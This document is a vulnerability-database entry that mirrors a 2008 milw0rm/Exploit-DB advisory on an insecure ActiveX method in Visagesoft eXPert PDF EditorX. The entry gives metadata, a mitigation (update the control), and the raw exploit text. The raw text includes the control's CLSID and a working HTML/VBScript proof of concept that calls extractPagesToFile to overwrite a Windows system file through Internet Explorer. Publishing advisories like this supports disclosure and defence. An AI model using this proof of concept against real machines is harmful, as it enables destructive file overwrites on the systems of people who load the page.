VISAGESOFT eXPert PDF EditorX (VSPDFEditorX.ocx) INSECURE METHOD

vendor:

eXPert PDF EditorX

by:

Marco Torti

7.5

CVSS

HIGH

Insecure Method

CWE

Product Name: eXPert PDF EditorX

Affected Version From: 1.0.200.0

Affected Version To: 1.0.200.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:visagesoft:expert_pdf_editorx

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP3

2008

VISAGESOFT eXPert PDF EditorX (VSPDFEditorX.ocx) INSECURE METHOD

The 'extractPagesToFile' method of Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx) does not check user supplied arguments, allowing an attacker to save/overwrite a specified file passed as argument.

Mitigation:

Update to the latest version of Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx)

Source

Exploit-DB raw data:

VISAGESOFT eXPert PDF EditorX (VSPDFEditorX.ocx) INSECURE METHOD
 SITE: http://www.visagesoft.com
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 Author: Marco Torti
 mail: marcotorti2[at]yahoo[dot]com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 FileVersion:   1.0.200.0
 CLSID:  {89F968A1-DBAC-4807-9B3C-405A55E4A279}
 Description: Visagesoft eXPert PDF EditorX
 ProgID:        VSPDFEditorX.VSPDFEdit
 
  Marked as:
  RegKey Safe for Script: False
  RegKey Safe for Init: False
  Implements IObjectSafety: True
  IDisp Safe: Safe for untrusted: caller,data 
  IPStorage Safe: Safe for untrusted: caller,data
  KillBitSet: False
 
 ---Vulnerable method:
 ---extractPagesToFile(ByVal Filename  As String ,ByVal PagesRange  As String )

 ---Vulnerability Description:
    The "extractPagesToFile" method doesn't check user supplied arguments so we
    can save/overwrite a specified file passed as argument.
 Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 7
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
<object classid='clsid:89F968A1-DBAC-4807-9B3C-405A55E4A279' id='target'/></object>
<input language=VBScript onclick=launch() type=button value='start'>
<script language='vbscript'>
Sub launch
target.extractPagesToFile "c:\windows\-system.ini","defaultV"
MsgBox"Exploit Completed.. file overwrite!"
End Sub
</script>

# milw0rm.com [2008-12-05]